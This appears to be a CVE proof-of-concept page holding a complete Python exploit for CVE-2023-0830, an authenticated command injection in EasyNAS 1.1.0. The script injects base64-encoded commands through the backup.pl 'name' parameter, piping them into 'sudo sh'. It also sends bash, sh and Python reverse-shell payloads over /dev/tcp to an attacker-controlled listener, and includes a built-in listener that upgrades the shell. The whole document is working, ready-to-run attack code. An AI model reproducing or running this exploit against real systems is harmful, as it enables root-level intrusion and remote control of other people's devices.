4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-0830.py PY
#!/usr/bin/env python3

import requests
import argparse
import sys
import base64
import urllib.parse
import time
import re
import socket
import threading
import select
import termios
import tty
import os
import random
import string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

verbose = False

def log_info(message):
    print(f"[i] {message}")

def log_success(message):
    print(f"[+] {message}")

def log_error(message):
    print(f"[-] {message}")

def log_verbose(message):
    if verbose:
        print(f"[v] {message}")

def login(url, username, password, protocol="https", skip_verify=True):
    """Login to the EasyNAS web interface"""
    try:
        log_info(f"Attempting to login as {username} at {protocol}://{url}...")
        
        # Create a session
        session = requests.Session()
        
        # Disable SSL verification if requested
        session.verify = not skip_verify
        
        # Send the login request
        login_url = f"{protocol}://{url}/easynas/login.pl"
        
        # These are the actual field names in the EasyNAS login form
        login_data = {
            'usr': username,
            'pwd': password,
            'action': 'login'
        }
        
        headers = {
            'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'
        }
        
        # Try HTTPS first
        try:
            response = session.post(login_url, data=login_data, headers=headers, timeout=5)
            
            # Check for login failure indications
            if 'Login to EasyNAS' in response.text:
                log_error("Login failed: Invalid credentials or server error")
                return None
                
            # A less strict check for success - if we don't see the login page again
            log_success("Login successful")
            return session
                
        except requests.exceptions.SSLError:
            # If HTTPS fails with SSL error and protocol is https, try HTTP
            if protocol == "https":
                log_info("SSL error, trying HTTP instead...")
                return login(url, username, password, "http", skip_verify)
        except requests.exceptions.ConnectionError:
            # If HTTPS connection fails and protocol is https, try HTTP
            if protocol == "https":
                log_info("Connection error, trying HTTP instead...")
                return login(url, username, password, "http", skip_verify)
        except Exception as e:
            log_error(f"Login failed: {str(e)}")
            return None
            
    except Exception as e:
        log_error(f"Login failed: {str(e)}")
        return None

def execute_command(session, url, command, protocol="https"):
    """Execute a command on the target using the original technique"""
    try:
        # Encode the command in base64 - exactly like original exploit
        encoded_cmd = base64.b64encode(command.encode()).decode()
        
        # Construct the exploit URL - EXACTLY as in the original exploit
        exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cmd}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending request to: {exploit_url}")
        
        # Execute the command
        response = session.get(
            exploit_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        if response.status_code != 200:
            return f"Error: HTTP status code {response.status_code}"
            
        # Different patterns to try to extract command output
        patterns = [
            re.compile(r'backup name is invalid\s*<br>(.*?)</div>', re.DOTALL),  # Main pattern
            re.compile(r'backup name is invalid\s*<br>(.*?)$', re.DOTALL),       # Alternative pattern
            re.compile(r'backup name is invalid\s*(.*?)</div>', re.DOTALL),      # Fallback pattern
            re.compile(r'<div class="alertbad">(.*?)</div>', re.DOTALL),         # Error message pattern
        ]
        
        # Try all patterns
        for pattern in patterns:
            match = pattern.search(response.text)
            if match:
                output = match.group(1).strip()
                if output:
                    return output
        
        # If no output was captured, try a fallback approach using a temporary file
        # This creates a two-stage approach
        log_verbose("No output captured in response, trying two-stage approach")
        
        # Generate a unique filename
        tmp_file = f"/tmp/out_{int(time.time())}_{random.randint(1000, 9999)}.txt"
        
        # Execute the command and redirect output to the temporary file
        stage1_cmd = f"{command} > {tmp_file} 2>&1"
        encoded_stage1 = base64.b64encode(stage1_cmd.encode()).decode()
        
        # Construct the exploit URL - exactly as in the original exploit
        stage1_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_stage1}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending stage 1 request to: {stage1_url}")
        
        # Execute the first stage
        session.get(
            stage1_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        # Now read the temporary file
        read_cmd = f"cat {tmp_file}"
        encoded_read = base64.b64encode(read_cmd.encode()).decode()
        
        # Construct the exploit URL - exactly as in the original exploit
        read_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_read}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending read request to: {read_url}")
        
        # Execute the read command
        read_response = session.get(
            read_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        # Try to extract output
        for pattern in patterns:
            match = pattern.search(read_response.text)
            if match:
                output = match.group(1).strip()
                if output:
                    # Clean up the temporary file
                    cleanup_cmd = f"rm -f {tmp_file}"
                    encoded_cleanup = base64.b64encode(cleanup_cmd.encode()).decode()
                    cleanup_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cleanup}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
                    session.get(cleanup_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, verify=False)
                    return output
        
        # If we still don't have output, return a generic message
        return "Command executed, but no output was captured"
    except Exception as e:
        return f"Error: {str(e)}"

class IntegratedListener:
    def __init__(self, host='0.0.0.0', port=4444):
        self.host = host
        self.port = port
        self.socket = None
        self.client = None
        self.running = False
        self.original_terminal_settings = None
        self.shell_upgraded = False
    
    def start(self):
        """Start the listener in a separate thread"""
        self.running = True
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        
        try:
            self.socket.bind((self.host, self.port))
            self.socket.listen(1)
            log_success(f"Listener started on {self.host}:{self.port}")
            log_info("Waiting for incoming connection...")
            
            # Set a timeout so we can check for stop flag
            self.socket.settimeout(1)
            
            while self.running:
                try:
                    self.client, addr = self.socket.accept()
                    log_success(f"Received connection from {addr[0]}:{addr[1]}")
                    self.handle_client()
                    break
                except socket.timeout:
                    continue
                except Exception as e:
                    log_error(f"Error accepting connection: {e}")
                    break
                    
        except Exception as e:
            log_error(f"Error starting listener: {e}")
        finally:
            self.stop()
            
    def stop(self):
        """Stop the listener"""
        self.running = False
        
        # Reset terminal settings
        self._reset_terminal()
        
        if self.client:
            try:
                self.client.close()
            except:
                pass
            self.client = None
            
        if self.socket:
            try:
                self.socket.close()
            except:
                pass
            self.socket = None
    
    def _reset_terminal(self):
        """Reset terminal settings to original state"""
        if self.original_terminal_settings:
            try:
                # First print a newline to ensure we're at the start of a line
                sys.stdout.write("\n")
                sys.stdout.flush()
                
                # Reset terminal to normal mode
                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.original_terminal_settings)
                
                # Additional terminal cleanup
                os.system('stty sane')
                os.system('reset')
            except Exception as e:
                if verbose:
                    print(f"Error resetting terminal: {e}")
            
    def handle_client(self):
        """Handle the client connection with an interactive shell"""
        if not self.client:
            return
            
        log_success("Shell connection established!")
        log_info("Interactive shell session started")
        log_info("Type 'exit' or press Ctrl+C to exit")
        
        # Set terminal to raw mode for better interactive experience
        try:
            # Save current terminal settings
            self.original_terminal_settings = termios.tcgetattr(sys.stdin)
            
            # Set terminal to raw mode
            tty.setraw(sys.stdin.fileno())
            
            # Basic terminal setup
            if hasattr(os, 'system'):
                os.system('stty -echo')
        except Exception as e:
            log_verbose(f"Error setting terminal to raw mode: {e}")
        
        try:
            # Send initial commands to fix the terminal
            self._fix_remote_terminal()
            
            # Create two threads for sending and receiving data
            threading.Thread(target=self._send_data, daemon=True).start()
            self._receive_data()
        except KeyboardInterrupt:
            log_info("\nKeyboard interrupt received, closing connection")
        except Exception as e:
            log_error(f"\nError in shell session: {e}")
        finally:
            self.stop()
    
    def _fix_remote_terminal(self):
        """Send commands to fix the remote terminal"""
        if not self.client:
            return
            
        # Reset terminal and set up a proper environment
        time.sleep(0.5)
        
        # Get local terminal size for better experience
        try:
            # Get terminal size
            terminal_size = os.get_terminal_size()
            rows = terminal_size.lines
            cols = terminal_size.columns
        except:
            # Default if we can't get the size
            rows = 24
            cols = 80
        
        # First, send a basic cleanup sequence
        try:
            # Clear any pending input
            self.client.send(b"\n")
            time.sleep(0.1)
        except:
            pass
            
        # Try different approaches to fix the terminal
        shell_fix_commands = [
            # Try to fix the terminal in various ways
            "\r\n",
            "TERM=xterm-256color\n",
            "export TERM=xterm-256color\n",
            f"stty rows {rows} columns {cols}\n",
            
            # Method 1: Use script command
            "which script >/dev/null 2>&1 && (script -q /dev/null)\n",
            
            # Method 2: Use python pty
            "which python3 >/dev/null 2>&1 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python >/dev/null 2>&1 && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n",
            
            # Reset CTRL-C handling
            "stty intr ^C\n",
            # Set prompt to something simple and clean
            "PS1='\\$ '\n",
            "clear\n",
            "echo Shell stabilized\n"
        ]
        
        # Send each command with a small delay
        for cmd in shell_fix_commands:
            try:
                self.client.send(cmd.encode())
                time.sleep(0.2)
            except:
                pass
                
        # Final cleanup
        try:
            self.client.send(b"clear\n")
        except:
            pass
            
        time.sleep(0.3)  # Wait for commands to take effect
    
    def _send_data(self):
        """Send data from stdin to the client"""
        try:
            while self.running and self.client:
                # Check if there's data to read from stdin
                r, _, _ = select.select([sys.stdin], [], [], 0.1)
                if r:
                    data = os.read(sys.stdin.fileno(), 1024)
                    if not data:
                        break
                    self.client.send(data)
        except:
            pass
    
    def _receive_data(self):
        """Receive data from client and write to stdout"""
        try:
            buffer = b""
            while self.running and self.client:
                # Check if there's data to read from the client
                r, _, _ = select.select([self.client], [], [], 0.1)
                if r:
                    data = self.client.recv(1024)
                    if not data:
                        log_info("\nConnection closed by remote host")
                        break
                    
                    # Process data to handle terminal control sequences
                    buffer += data
                    
                    # Write data to stdout
                    os.write(sys.stdout.fileno(), data)
                    
                    # Look for error messages and handle them
                    if b"cannot set terminal process group" in buffer:
                        # This is a common error in reverse shells
                        # Send additional commands to fix terminal issues
                        time.sleep(0.5)
                        self.client.send(b"export TERM=xterm\n")
                        self.client.send(b"stty raw -echo\n")
                        self.client.send(b"reset\n")
                        time.sleep(0.5)
                        
                        # Try to reset with a clean buffer
                        buffer = b""
                        
                    # If we detect a shell prompt, try to upgrade it
                    if (b"$ " in buffer or b"# " in buffer or b"sh-" in buffer) and b"python" not in buffer:
                        if b"bash" not in buffer and b"pty" not in buffer:
                            time.sleep(0.3)
                            # Try to upgrade to a better shell if we haven't already
                            self.client.send(b"which python3 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n")
                            time.sleep(0.3)
                            self.client.send(b"export TERM=xterm\n")
                            self.client.send(b"stty rows 24 columns 80\n")
                            self.client.send(b"clear\n")
                            buffer = b""
        except:
            pass

def reverse_shell(session, url, listener_ip, listener_port, protocol="https", integrated_listener=False, shell_type="bash"):
    """
    Create a reverse shell connection to the specified listener
    If integrated_listener is True, will start a listener in the script itself
    shell_type can be one of: bash, sh, python
    """
    if integrated_listener:
        # Check if the listener IP is valid for receiving connections
        if listener_ip in ['0.0.0.0', '127.0.0.1', 'localhost']:
            log_info("Using local listener - determining external IP")
            # Try to determine external IP or use default interface
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                s.connect(("8.8.8.8", 80))
                listener_ip = s.getsockname()[0]
                s.close()
                log_success(f"Using {listener_ip} as listener address")
            except:
                log_error("Could not determine external IP")
                log_info("Please specify your actual IP address with --lhost")
                return False
    
        # Start the integrated listener in a separate thread
        listener = IntegratedListener(host='0.0.0.0', port=listener_port)
        listener_thread = threading.Thread(target=listener.start)
        listener_thread.daemon = True
        listener_thread.start()
        
        # Wait a moment for the listener to start
        time.sleep(1)
    
    try:
        log_info(f"Sending reverse shell to {listener_ip}:{listener_port}...")
        
        # Create the reverse shell payload
        if integrated_listener:
            # Choose payload based on shell_type
            if shell_type == "python":
                # Python-based shell with pty support
                python_script = f'''
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{listener_ip}",{listener_port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
'''
                encoded_script = base64.b64encode(python_script.encode()).decode()
                payload = f"python3 -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || python -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || /bin/bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
            
            elif shell_type == "bash":
                # Bash reverse shell with some additional settings for better experience
                payload = f"bash -c 'exec bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
            
            else:  # sh
                # Basic sh reverse shell
                payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
        else:
            # Standard shell for normal netcat
            payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
        
        # Encode the payload in base64 - exactly like original
        payload = base64.b64encode(payload.encode()).decode()
        
        # URL encode the payload - exactly like original
        payload = urllib.parse.quote(payload)
        
        # Construct the exploit URL - EXACTLY as in the original exploit
        # The key part is: echo+{base64_payload}+|+base64+-d+|+sudo+sh+||a+#
        exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending request to: {exploit_url}")
        
        # Set timeout as in the original exploit
        timeout = 3
        
        try:
            # Try the main reverse shell payload
            log_verbose("Sending reverse shell payload with timeout=" + str(timeout))
            session.get(
                exploit_url, 
                headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
                timeout=timeout, 
                verify=False
            )
            log_error("Request completed without timeout - shell may have failed")
        except requests.exceptions.ReadTimeout:
            # This is expected as in the original exploit
            log_success("Timeout occurred as expected - connection should be established")
            
            if integrated_listener:
                # Keep the main thread alive until the listener thread exits
                while listener_thread.is_alive():
                    try:
                        time.sleep(0.5)
                    except KeyboardInterrupt:
                        log_info("\nKeyboard interrupt received, stopping listener")
                        listener.stop()
                        break
                
            return True
        except requests.exceptions.RequestException as e:
            log_success(f"Connection interrupted - check your listener: {e}")
            
        # Give guidance if it doesn't work immediately
        if not integrated_listener:
            log_info("If you don't receive a connection, try these alternatives:")
            log_info("1. Make sure your listener is running: nc -lvnp " + str(listener_port))
            log_info("2. Try using HTTP protocol instead of HTTPS with --protocol http")
            log_info("3. Ensure there are no firewalls blocking the connection")
        
        return True
    except Exception as e:
        log_error(f"Error setting up reverse shell: {str(e)}")
        return False

def main():
    global verbose
    
    print(r"""
             EasyNAS 1.1.0 Authenticated Command Injection - CVE-2023-0830
      
                      Created by Ivan Spiridonov (xbz0n)
                             https://xbz0n.sh
    """)
    
    parser = argparse.ArgumentParser(description='EasyNAS 1.1.0 Authenticated Command Injection Exploit')
    parser.add_argument('url', help='Target URL with or without protocol (e.g., example.com:8080)')
    parser.add_argument('username', help='EasyNAS username')
    parser.add_argument('password', help='EasyNAS password')
    parser.add_argument('--mode', choices=['shell', 'reverse'], default='shell',
                        help='Exploitation mode: shell (integrated reverse shell) or reverse (external listener) (default: shell)')
    parser.add_argument('--lhost', help='IP address for the reverse shell listener (your IP, auto-detected by default)')
    parser.add_argument('--lport', type=int, default=4444, help='Port for the reverse shell listener (default: 4444)')
    parser.add_argument('--protocol', choices=['http', 'https'], default='https', 
                        help='Protocol to use (default: https)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')
    parser.add_argument('--shell', choices=['bash', 'sh', 'python'], default='bash',
                        help='Specify the shell type to use with integrated listener (default: bash)')
    
    args = parser.parse_args()
    
    verbose = args.verbose
    
    target_url = args.url
    if target_url.startswith("http://") or target_url.startswith("https://"):
        log_verbose(f"Stripping protocol from URL: {target_url}")
        target_url = target_url.split("://")[1]
    
    log_verbose(f"Target URL: {target_url}")
    log_verbose(f"Using protocol: {args.protocol}")
    
    if args.mode == 'reverse' and (not args.lhost or not args.lport):
        log_error("External reverse shell requires both --lhost and --lport")
        parser.print_help()
        sys.exit(1)
    
    session = login(target_url, args.username, args.password, args.protocol)
    if not session:
        sys.exit(1)
    
    if args.mode == 'shell':
        if not args.lhost:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                s.connect(("8.8.8.8", 80))
                args.lhost = s.getsockname()[0]
                s.close()
                log_success(f"Using {args.lhost} as listener address")
            except:
                args.lhost = '0.0.0.0'
        
        log_info(f"Starting integrated reverse shell on port {args.lport}")
        reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=True, shell_type=args.shell)
    
    elif args.mode == 'reverse':
        log_info(f"Sending reverse shell to external listener at {args.lhost}:{args.lport}")
        log_info("Make sure you have a listener running with: nc -lvnp " + str(args.lport))
        reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=False)

if __name__ == "__main__":
    main()